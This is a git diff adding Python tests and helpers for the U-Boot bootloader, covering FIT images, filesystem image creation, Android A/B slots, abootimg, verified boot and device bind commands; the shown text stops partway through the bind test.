diff options
Diffstat (limited to 'test/py/tests')
147 files changed, 21190 insertions, 0 deletions
diff --git a/test/py/tests/bootstd/armbian.bmp.xz b/test/py/tests/bootstd/armbian.bmp.xz Binary files differnew file mode 100644 index 00000000000..ad137ea6e6d --- /dev/null +++ b/test/py/tests/bootstd/armbian.bmp.xz diff --git a/test/py/tests/fit_util.py b/test/py/tests/fit_util.py new file mode 100644 index 00000000000..f322b50a319 --- /dev/null +++ b/test/py/tests/fit_util.py @@ -0,0 +1,93 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright 2022 Google LLC + +"""Common utility functions for FIT tests""" + +import os + +import utils + +def make_fname(ubman, basename): + """Make a temporary filename + + Args: + ubman (ConsoleBase): ubman to use + basename (str): Base name of file to create (within temporary directory) + Return: + Temporary filename + """ + + return os.path.join(ubman.config.build_dir, basename) + +def make_its(ubman, base_its, params, basename='test.its'): + """Make a sample .its file with parameters embedded + + Args: + ubman (ConsoleBase): ubman to use + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Returns: + str: Filename of .its file created + """ + its = make_fname(ubman, basename) + with open(its, 'w', encoding='utf-8') as outf: + print(base_its % params, file=outf) + return its + +def make_fit(ubman, mkimage, base_its, params, basename='test.fit', base_fdt=None): + """Make a sample .fit file ready for loading + + This creates a .its script with the selected parameters and uses mkimage to + turn this into a .fit image. + + Args: + ubman (ConsoleBase): ubman to use + mkimage (str): Filename of 'mkimage' utility + base_its (str): Template text for the .its file, typically containing + %() references + params (dict of str): Parameters to embed in the %() strings + basename (str): base name to write to (will be placed in the temp dir) + Return: + Filename of .fit file created + """ + fit = make_fname(ubman, basename) + its = make_its(ubman, base_its, params) + utils.run_and_log(ubman, [mkimage, '-f', its, fit]) + if base_fdt: + with open(make_fname(ubman, 'u-boot.dts'), 'w') as fd: + fd.write(base_fdt) + return fit + +def make_kernel(ubman, basename, text): + """Make a sample kernel with test data + + Args: + ubman (ConsoleBase): ubman to use + basename (str): base name to write to (will be placed in the temp dir) + text (str): Contents of the kernel file (will be repeated 100 times) + Returns: + str: Full path and filename of the kernel it created + """ + fname = make_fname(ubman, basename) + data = '' + for i in range(100): + data += f'this {text} {i} is unlikely to boot\n' + with open(fname, 'w', encoding='utf-8') as outf: + print(data, file=outf) + return fname + +def make_dtb(ubman, base_fdt, basename): + """Make a sample .dts file and compile it to a .dtb + + Returns: + ubman (ConsoleBase): ubman to use + Filename of .dtb file created + """ + src = make_fname(ubman, f'{basename}.dts') + dtb = make_fname(ubman, f'{basename}.dtb') + with open(src, 'w', encoding='utf-8') as outf: + outf.write(base_fdt) + utils.run_and_log(ubman, ['dtc', src, '-O', 'dtb', '-o', dtb]) + return dtb diff --git a/test/py/tests/fs_helper.py b/test/py/tests/fs_helper.py new file mode 100644 index 00000000000..d85e2b98a24 --- /dev/null +++ b/test/py/tests/fs_helper.py @@ -0,0 +1,78 @@ +# SPDX-License-Identifier: GPL-2.0+ +# +# Copyright (c) 2018, Linaro Limited +# Author: Takahiro Akashi <takahiro.akashi@linaro.org> + +"""Helper functions for dealing with filesystems""" + +import re +import os +from subprocess import call, check_call, check_output, CalledProcessError + +def mk_fs(config, fs_type, size, prefix, src_dir=None, size_gran = 0x100000): + """Create a file system volume + + Args: + config (u_boot_config): U-Boot configuration + fs_type (str): File system type, e.g. 'ext4' + size (int): Size of file system in bytes + prefix (str): Prefix string of volume's file name + src_dir (str): Root directory to use, or None for none + size_gran (int): Size granularity of file system image in bytes + + Raises: + CalledProcessError: if any error occurs when creating the filesystem + """ + fs_img = f'{prefix}.{fs_type}.img' + fs_img = os.path.join(config.persistent_data_dir, fs_img) + + if fs_type == 'fat12': + mkfs_opt = '-F 12' + elif fs_type == 'fat16': + mkfs_opt = '-F 16' + elif fs_type == 'fat32': + mkfs_opt = '-F 32' + else: + mkfs_opt = '' + + if re.match('fat', fs_type): + fs_lnxtype = 'vfat' + else: + fs_lnxtype = fs_type + + if src_dir: + if fs_lnxtype == 'ext4': + mkfs_opt = mkfs_opt + ' -d ' + src_dir + elif fs_lnxtype != 'vfat': + raise ValueError(f'src_dir not implemented for fs {fs_lnxtype}') + + count = (size + size_gran - 1) // size_gran + + # Some distributions do not add /sbin to the default PATH, where mkfs lives + if '/sbin' not in os.environ["PATH"].split(os.pathsep): + os.environ["PATH"] += os.pathsep + '/sbin' + + try: + check_call(f'rm -f {fs_img}', shell=True) + check_call(f'truncate -s $(( {size_gran} * {count} )) {fs_img}', + shell=True) + check_call(f'mkfs.{fs_lnxtype} {mkfs_opt} {fs_img}', shell=True) + if fs_type == 'ext4': + sb_content = check_output(f'tune2fs -l {fs_img}', + shell=True).decode() + if 'metadata_csum' in sb_content: + check_call(f'tune2fs -O ^metadata_csum {fs_img}', shell=True) + elif fs_lnxtype == 'vfat' and src_dir: + check_call(f'mcopy -i {fs_img} -vsmpQ {src_dir}/* ::/', shell=True) + return fs_img + except CalledProcessError: + call(f'rm -f {fs_img}', shell=True) + raise + +# Just for trying out +if __name__ == "__main__": + import collections + + CNF= collections.namedtuple('config', 'persistent_data_dir') + + mk_fs(CNF('.'), 'ext4', 0x1000000, 'pref') diff --git a/test/py/tests/source.its b/test/py/tests/source.its new file mode 100644 index 00000000000..3c62f777f17 --- /dev/null +++ b/test/py/tests/source.its @@ -0,0 +1,43 @@ +/dts-v1/; + +/ { + description = "FIT image to test the source command"; + #address-cells = <1>; + + images { + default = "script-1"; + + script-1 { + data = "echo 1"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + script-2 { + data = "echo 2"; + type = "script"; + arch = "sandbox"; + compression = "none"; + }; + + not-a-script { + data = "echo 3"; + type = "kernel"; + arch = "sandbox"; + compression = "none"; + }; + }; + + configurations { + default = "conf-2"; + + conf-1 { + script = "script-1"; + }; + + conf-2 { + script = "script-2"; + }; + }; +}; diff --git a/test/py/tests/test_000_version.py b/test/py/tests/test_000_version.py new file mode 100644 index 00000000000..b95ceae2346 --- /dev/null +++ b/test/py/tests/test_000_version.py @@ -0,0 +1,19 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# pytest runs tests the order of their module path, which is related to the +# filename containing the test. This file is named such that it is sorted +# first, simply as a very basic sanity check of the functionality of the U-Boot +# command prompt. + +def test_version(ubman): + """Test that the "version" command prints the U-Boot version.""" + + # "version" prints the U-Boot sign-on message. This is usually considered + # an error, so that any unexpected reboot causes an error. Here, this + # error detection is disabled since the sign-on message is expected. + with ubman.disable_check('main_signon'): + response = ubman.run_command('version') + # Ensure "version" printed what we expected. + ubman.validate_version_string_in_text(response) diff --git a/test/py/tests/test_android/test_ab.py b/test/py/tests/test_android/test_ab.py new file mode 100644 index 00000000000..5876a137463 --- /dev/null +++ b/test/py/tests/test_android/test_ab.py @@ -0,0 +1,98 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2018 Texas Instruments, <www.ti.com> + +# Test A/B update commands. + +import os +import pytest +import utils + +class ABTestDiskImage(object): + """Disk Image used by the A/B tests.""" + + def __init__(self, ubman): + """Initialize a new ABTestDiskImage object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + filename = 'test_ab_disk_image.bin' + + persistent = ubman.config.persistent_data_dir + '/' + filename + self.path = ubman.config.result_dir + '/' + filename + + with utils.persistent_file_helper(ubman.log, persistent): + if os.path.exists(persistent): + ubman.log.action('Disk image file ' + persistent + + ' already exists') + else: + ubman.log.action('Generating ' + persistent) + fd = os.open(persistent, os.O_RDWR | os.O_CREAT) + os.ftruncate(fd, 524288) + os.close(fd) + cmd = ('sgdisk', persistent) + utils.run_and_log(ubman, cmd) + + cmd = ('sgdisk', '--new=1:64:512', '--change-name=1:misc', + persistent) + utils.run_and_log(ubman, cmd) + cmd = ('sgdisk', '--load-backup=' + persistent) + utils.run_and_log(ubman, cmd) + + cmd = ('cp', persistent, self.path) + utils.run_and_log(ubman, cmd) + +di = None +@pytest.fixture(scope='function') +def ab_disk_image(ubman): + global di + if not di: + di = ABTestDiskImage(ubman) + return di + +def ab_dump(ubman, slot_num, crc): + output = ubman.run_command('bcb ab_dump host 0#misc') + header, slot0, slot1 = output.split('\r\r\n\r\r\n') + slots = [slot0, slot1] + slot_suffixes = ['_a', '_b'] + + header = dict(map(lambda x: map(str.strip, x.split(':')), header.split('\r\r\n'))) + assert header['Bootloader Control'] == '[misc]' + assert header['Active Slot'] == slot_suffixes[slot_num] + assert header['Magic Number'] == '0x42414342' + assert header['Version'] == '1' + assert header['Number of Slots'] == '2' + assert header['Recovery Tries Remaining'] == '0' + assert header['CRC'] == '{} (Valid)'.format(crc) + + slot = dict(map(lambda x: map(str.strip, x.split(':')), slots[slot_num].split('\r\r\n\t- ')[1:])) + assert slot['Priority'] == '15' + assert slot['Tries Remaining'] == '6' + assert slot['Successful Boot'] == '0' + assert slot['Verity Corrupted'] == '0' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_ab') +@pytest.mark.buildconfigspec('cmd_bcb') +@pytest.mark.requiredtool('sgdisk') +def test_ab(ab_disk_image, ubman): + """Test the 'bcb ab_select' command.""" + + ubman.run_command('host bind 0 ' + ab_disk_image.path) + + output = ubman.run_command('bcb ab_select slot_name host 0#misc') + assert 're-initializing A/B metadata' in output + assert 'Attempting slot a, tries remaining 7' in output + output = ubman.run_command('printenv slot_name') + assert 'slot_name=a' in output + ab_dump(ubman, 0, '0xd438d1b9') + + output = ubman.run_command('bcb ab_select slot_name host 0:1') + assert 'Attempting slot b, tries remaining 7' in output + output = ubman.run_command('printenv slot_name') + assert 'slot_name=b' in output + ab_dump(ubman, 1, '0x011ec016') diff --git a/test/py/tests/test_android/test_abootimg.py b/test/py/tests/test_android/test_abootimg.py new file mode 100644 index 00000000000..2aadb692b30 --- /dev/null +++ b/test/py/tests/test_android/test_abootimg.py @@ -0,0 +1,268 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020 +# Author: Sam Protsenko <joe.skb7@gmail.com> + +# Test U-Boot's "abootimg" commands. + +import os +import pytest +import utils + +""" +These tests rely on disk image (boot.img), which is automatically created by +the test from the stored hex dump. This is done to avoid the dependency on the +most recent mkbootimg tool from AOSP/master. Here is the list of commands which +was used to generate the boot.img and obtain compressed hex dump from it: + + $ echo '/dts-v1/; / { model = "x1"; compatible = "y1,z1"; };' > test1.dts + $ echo '/dts-v1/; / { model = "x2"; compatible = "y2,z2"; };' > test2.dts + $ dtc test1.dts > dt1.dtb + $ dtc test2.dts > dt2.dtb + $ cat dt1.dtb dt2.dtb > dtb.img + $ echo 'kernel payload' > kernel + $ echo 'ramdisk payload' > ramdisk.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 2 --output boot.img + $ gzip -9 boot.img + $ xxd -p boot.img.gz > boot.img.gz.hex + +Now one can obtain original boot.img from this hex dump like this: + + $ xxd -r -p boot.img.gz.hex boot.img.gz + $ gunzip -9 boot.img.gz + +For boot image header version 4, these tests rely on two images that are generated +using the same steps above : + +1- boot.img : + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --header_version 4 --output ./boot.img + +2- vendor_boot.img + $ mkbootimg --kernel ./kernel --ramdisk ./ramdisk.img \ + --cmdline "cmdline test" --dtb ./dtb.img \ + --os_version R --os_patch_level 2019-06-05 \ + --pagesize 4096 --vendor_ramdisk ./ramdisk.img \ + --header_version 4 --vendor_boot ./vboot.img \ + +""" + +# boot.img.gz hex dump +img_hex = """1f8b08084844af5d0203626f6f742e696d670073f47309f2f77451e46700 +820606010106301084501f04181819041838181898803c3346060c909c9b +92939997aa50925a5cc2300a461c3078b2e1793c4b876fd92db97939fb6c +b7762ffff07d345446c1281805e8a0868d81e117a45e111c0d8dc101b253 +8bf25273140a122b73f21353b8460364148c8251300a46c1281801a02831 +3725b3387bb401300a46c1281805a360148c207081f7df5b20550bc41640 +9c03c41a0c90f17fe85400986d82452b6c3680198a192a0ce17c3610ae34 +d4a9820881a70f3873f35352731892f3730b124b32937252a96bb9119ae5 +463a5546f82c1f05a360148c8251300a462e000085bf67f200200000""" + +# boot img v4 hex dump +boot_img_hex = """1f8b080827b0cd630203626f6f742e696d6700edd8bd0d82601885d1d7c4 +58d8c808b88195bd098d8d246e40e42b083f1aa0717be99d003d277916b8 +e5bddc8a7b792d8e8788c896ce9b88d32ebe6c971e7ddd3543cae734cd01 +c0ffc84c0000b0766d1a87d4e5afeadd3dab7a6f10000000f84163d5d7cd +d43a000000000000000060c53e7544995700400000""" + +# vendor boot image v4 hex dump +vboot_img_hex = """1f8b0808baaecd63020376626f6f742e696d6700edd8310b824018c6f1b3 +222a08f41b3436b4280dcdd19c11d16ee9109d18d59042d047ec8b04cd0d +d19d5a4345534bf6ffc173ef29272f38e93b1d0ec67dd79d548462aa1cd2 +d5d20b0000f8438678f90c18d584b8a4bbb3a557991ecb2a0000f80d6b2f +f4179b656be5c532f2fc066f040000000080e23936af2755f62a3d918df1 +db2a7ab67f9ffdeb7df7cda3465ecb79c4ce7e5c577562bb9364b74449a5 +1e467e20c53c0a57de763193c1779b3b4fcd9d4ee27c6a0e00000000c0ff +309ffea7010000000040f1dc004129855400400000""" + +# Expected response for "abootimg dtb_dump" command +dtb_dump_resp="""## DTB area contents (concat format): + - DTB #0: + (DTB)size = 125 + (DTB)model = x1 + (DTB)compatible = y1,z1 + - DTB #1: + (DTB)size = 125 + (DTB)model = x2 + (DTB)compatible = y2,z2""" +# Address in RAM where to load the boot image ('abootimg' looks in $loadaddr) +loadaddr = 0x1000 +# Address in RAM where to load the vendor boot image ('abootimg' looks in $vloadaddr) +vloadaddr= 0x10000 +# Expected DTB #1 offset from the boot image start address +dtb1_offset = 0x187d +# Expected DTB offset from the vendor boot image start address +dtb2_offset = 0x207d +# DTB #1 start address in RAM +dtb1_addr = loadaddr + dtb1_offset +# DTB #2 start address in RAM +dtb2_addr = vloadaddr + dtb2_offset + +class AbootimgTestDiskImage(object): + """Disk image used by abootimg tests.""" + + def __init__(self, ubman, image_name, hex_img): + """Initialize a new AbootimgDiskImage object. + + Args: + ubman: A U-Boot console. + + Returns: + Nothing. + """ + + gz_hex = ubman.config.persistent_data_dir + '/' + image_name + '.gz.hex' + gz = ubman.config.persistent_data_dir + '/' + image_name + '.gz' + + filename = image_name + persistent = ubman.config.persistent_data_dir + '/' + filename + self.path = ubman.config.result_dir + '/' + filename + ubman.log.action('persistent is ' + persistent) + with utils.persistent_file_helper(ubman.log, persistent): + if os.path.exists(persistent): + ubman.log.action('Disk image file ' + persistent + + ' already exists') + else: + ubman.log.action('Generating ' + persistent) + + f = open(gz_hex, "w") + f.write(hex_img) + f.close() + cmd = ('xxd', '-r', '-p', gz_hex, gz) + utils.run_and_log(ubman, cmd) + cmd = ('gunzip', '-9', gz) + utils.run_and_log(ubman, cmd) + + cmd = ('cp', persistent, self.path) + utils.run_and_log(ubman, cmd) + +gtdi1 = None +@pytest.fixture(scope='function') +def abootimg_disk_image(ubman): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi1 + if not gtdi1: + gtdi1 = AbootimgTestDiskImage(ubman, 'boot.img', img_hex) + return gtdi1 + +gtdi2 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_vboot(ubman): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi2 + if not gtdi2: + gtdi2 = AbootimgTestDiskImage(ubman, 'vendor_boot.img', vboot_img_hex) + return gtdi2 + +gtdi3 = None +@pytest.fixture(scope='function') +def abootimgv4_disk_image_boot(ubman): + """pytest fixture to provide a AbootimgTestDiskImage object to tests. + This is function-scoped because it uses ubman, which is also + function-scoped. However, we don't need to actually do any function-scope + work, so this simply returns the same object over and over each time.""" + + global gtdi3 + if not gtdi3: + gtdi3 = AbootimgTestDiskImage(ubman, 'bootv4.img', boot_img_hex) + return gtdi3 + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimg(abootimg_disk_image, ubman): + """Test the 'abootimg' command.""" + + ubman.log.action('Loading disk image to RAM...') + ubman.run_command('setenv loadaddr 0x%x' % (loadaddr)) + ubman.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimg_disk_image.path)) + + ubman.log.action('Testing \'abootimg get ver\'...') + response = ubman.run_command('abootimg get ver') + assert response == "2" + ubman.run_command('abootimg get ver v') + response = ubman.run_command('env print v') + assert response == 'v=2' + + ubman.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = ubman.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: recovery_dtbo_size is 0' + + ubman.log.action('Testing \'abootimg dump dtb\'...') + response = ubman.run_command('abootimg dump dtb').replace('\r', '') + assert response == dtb_dump_resp + + ubman.log.action('Testing \'abootimg get dtb_load_addr\'...') + ubman.run_command('abootimg get dtb_load_addr a') + response = ubman.run_command('env print a') + assert response == 'a=11f00000' + + ubman.log.action('Testing \'abootimg get dtb --index\'...') + ubman.run_command('abootimg get dtb --index=1 dtb1_start') + response = ubman.run_command('env print dtb1_start') + correct_str = "dtb1_start=%x" % (dtb1_addr) + assert response == correct_str + ubman.run_command('fdt addr $dtb1_start') + ubman.run_command('fdt get value v / model') + response = ubman.run_command('env print v') + assert response == 'v=x2' + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('android_boot_image') +@pytest.mark.buildconfigspec('cmd_abootimg') +@pytest.mark.buildconfigspec('cmd_fdt') +@pytest.mark.requiredtool('xxd') +@pytest.mark.requiredtool('gunzip') +def test_abootimgv4(abootimgv4_disk_image_vboot, abootimgv4_disk_image_boot, ubman): + """Test the 'abootimg' command with boot image header v4.""" + + ubman.log.action('Loading disk image to RAM...') + ubman.run_command('setenv loadaddr 0x%x' % (loadaddr)) + ubman.run_command('setenv vloadaddr 0x%x' % (vloadaddr)) + ubman.run_command('host load hostfs - 0x%x %s' % (vloadaddr, + abootimgv4_disk_image_vboot.path)) + ubman.run_command('host load hostfs - 0x%x %s' % (loadaddr, + abootimgv4_disk_image_boot.path)) + ubman.run_command('abootimg addr 0x%x 0x%x' % (loadaddr, vloadaddr)) + ubman.log.action('Testing \'abootimg get ver\'...') + response = ubman.run_command('abootimg get ver') + assert response == "4" + ubman.run_command('abootimg get ver v') + response = ubman.run_command('env print v') + assert response == 'v=4' + + ubman.log.action('Testing \'abootimg get recovery_dtbo\'...') + response = ubman.run_command('abootimg get recovery_dtbo a') + assert response == 'Error: header version must be >= 1 and <= 2 to get dtbo' + + ubman.log.action('Testing \'abootimg get dtb_load_addr\'...') + ubman.run_command('abootimg get dtb_load_addr a') + response = ubman.run_command('env print a') + assert response == 'a=11f00000' + + ubman.log.action('Testing \'abootimg get dtb --index\'...') + ubman.run_command('abootimg get dtb --index=1 dtb2_start') + response = ubman.run_command('env print dtb2_start') + correct_str = "dtb2_start=%x" % (dtb2_addr) + assert response == correct_str + + ubman.run_command('fdt addr $dtb2_start') + ubman.run_command('fdt get value v / model') + response = ubman.run_command('env print v') + assert response == 'v=x2' diff --git a/test/py/tests/test_android/test_avb.py b/test/py/tests/test_android/test_avb.py new file mode 100644 index 00000000000..137d83e1dea --- /dev/null +++ b/test/py/tests/test_android/test_avb.py @@ -0,0 +1,137 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2018, Linaro Limited +# +# Android Verified Boot 2.0 Test + +""" +This tests Android Verified Boot 2.0 support in U-Boot: + +For additional details about how to build proper vbmeta partition +check doc/android/avb2.rst + +For configuration verification: +- Corrupt boot partition and check for failure +- Corrupt vbmeta partition and check for failure +""" + +import pytest + +# defauld mmc id +mmc_dev = 1 +temp_addr = 0x90000000 +temp_addr2 = 0x90002000 + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +def test_avb_verify(ubman): + """Run AVB 2.0 boot verification chain with avb subset of commands + """ + + success_str = "Verification passed successfully" + + response = ubman.run_command('avb init %s' %str(mmc_dev)) + assert response == '' + response = ubman.run_command('avb verify') + assert response.find(success_str) + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_uuid(ubman): + """Check if 'avb get_uuid' works, compare results with + 'part list mmc 1' output + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('mmc rescan; mmc dev %s' % + str(mmc_dev)) + assert response.find('is current device') + + part_lines = ubman.run_command('mmc part').splitlines() + part_list = {} + cur_partname = '' + + for line in part_lines: + if '"' in line: + start_pt = line.find('"') + end_pt = line.find('"', start_pt + 1) + cur_partname = line[start_pt + 1: end_pt] + + if 'guid:' in line: + guid_to_check = line.split('guid:\t') + part_list[cur_partname] = guid_to_check[1] + + # lets check all guids with avb get_guid + for part, guid in part_list.items(): + avb_guid_resp = ubman.run_command('avb get_uuid %s' % part) + assert guid == avb_guid_resp.split('UUID: ')[1] + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_read_rb(ubman): + """Test reading rollback indexes + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb read_rb 1') + assert response == 'Rollback index: 0' + + +@pytest.mark.buildconfigspec('cmd_avb') +def test_avb_is_unlocked(ubman): + """Test if device is in the unlocked state + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb is_unlocked') + assert response == 'Unlocked = 1' + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.notbuildconfigspec('sandbox') +def test_avb_mmc_read(ubman): + """Test mmc read operation + """ + + response = ubman.run_command('mmc rescan; mmc dev %s 0' % + str(mmc_dev)) + assert response.find('is current device') + + response = ubman.run_command('mmc read 0x%x 0x100 0x1' % temp_addr) + assert response.find('read: OK') + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb read_part xloader 0 100 0x%x' % + temp_addr2) + assert response.find('Read 512 bytes') + + # Now lets compare two buffers + response = ubman.run_command('cmp 0x%x 0x%x 40' % + (temp_addr, temp_addr2)) + assert response.find('64 word') + + +@pytest.mark.buildconfigspec('cmd_avb') +@pytest.mark.buildconfigspec('optee_ta_avb') +def test_avb_persistent_values(ubman): + """Test reading/writing persistent storage to avb + """ + + response = ubman.run_command('avb init %s' % str(mmc_dev)) + assert response == '' + + response = ubman.run_command('avb write_pvalue test value_value') + assert response == 'Wrote 12 bytes' + + response = ubman.run_command('avb read_pvalue test 12') + assert response == 'Read 12 bytes, value = value_value' diff --git a/test/py/tests/test_bind.py b/test/py/tests/test_bind.py new file mode 100644 index 00000000000..16c63ae9684 --- /dev/null +++ b/test/py/tests/test_bind.py @@ -0,0 +1,193 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +""" Test for bind command """ + +import re +import pytest + +def in_tree(response, name, uclass, drv, depth, last_child): + lines = [x.strip() for x in response.splitlines()] + leaf = '' + if depth != 0: + leaf = ' ' + ' ' * (depth - 1) + if not last_child: + leaf = leaf + r'\|' + else: + leaf = leaf + '`' + + leaf = leaf + '-- ' + name + line = (r' *{:10.10} *[0-9]* \[ [ +] \] {:20.20} [` |]{}$' + .format(uclass, drv, leaf)) + prog = re.compile(line) + for l in lines: + if prog.match(l): + return True + return False + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +def test_bind_unbind_with_node(ubman): + + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind usb_ether driver (which has no compatible) to usb@1 node. + ##New entry usb_ether should appear in the dm tree + response = ubman.run_command('bind /usb@1 usb_ether') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'usb@1', 'ethernet', 'usb_ether', 1, True) + + #Unbind child #1. No error expected and all devices should be there except for bind-test-child1 + response = ubman.run_command('unbind /bind-test/bind-test-child1') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert 'bind-test-child1' not in tree + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #bind child #1. No error expected and all devices should be there + response = ubman.run_command('bind /bind-test/bind-test-child1 phy_sandbox') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, False) + + #Unbind child #2. No error expected and all devices should be there except for bind-test-child2 + response = ubman.run_command('unbind /bind-test/bind-test-child2') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert 'bind-test-child2' not in tree + + + #Bind child #2. No error expected and all devices should be there + response = ubman.run_command('bind /bind-test/bind-test-child2 simple_bus') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #Unbind parent. No error expected. All devices should be removed and unbound + response = ubman.run_command('unbind /bind-test') + assert response == '' + tree = ubman.run_command('dm tree') + assert 'bind-test' not in tree + assert 'bind-test-child1' not in tree + assert 'bind-test-child2' not in tree + + #try binding invalid node with valid driver + response = ubman.run_command('bind /not-a-valid-node simple_bus') + assert response != '' + tree = ubman.run_command('dm tree') + assert 'not-a-valid-node' not in tree + + #try binding valid node with invalid driver + response = ubman.run_command('bind /bind-test not_a_driver') + assert response != '' + tree = ubman.run_command('dm tree') + assert 'bind-test' not in tree + + #bind /bind-test. Device should come up as well as its children + response = ubman.run_command('bind /bind-test simple_bus') + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + response = ubman.run_command('unbind /bind-test') + assert response == '' + +def get_next_line(tree, name): + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + child_line = '' + for idx, line in enumerate(treelines): + if '-- ' + name in line: + try: + child_line = treelines[idx+1] + except: + pass + break + return child_line + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +@pytest.mark.singlethread +def test_bind_unbind_with_uclass(ubman): + #bind /bind-test + response = ubman.run_command('bind /bind-test simple_bus') + assert response == '' + + #make sure bind-test-child2 is there and get its uclass/index pair + tree = ubman.run_command('dm tree') + child2_line = [x.strip() for x in tree.splitlines() if '-- bind-test-child2' in x] + assert len(child2_line) == 1 + + child2_uclass = child2_line[0].split()[0] + child2_index = int(child2_line[0].split()[1]) + + #bind simple_bus as a child of bind-test-child2 + response = ubman.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = ubman.run_command('dm tree') + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = ubman.run_command('unbind simple_bus {}'.format(child_of_child2_index)) + assert response == '' + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + assert not in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #bind simple_bus as a child of bind-test-child2 + response = ubman.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = ubman.run_command('dm tree') + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = ubman.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + assert response == '' + + tree = ubman.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + child_of_child2_line = get_next_line(tree, 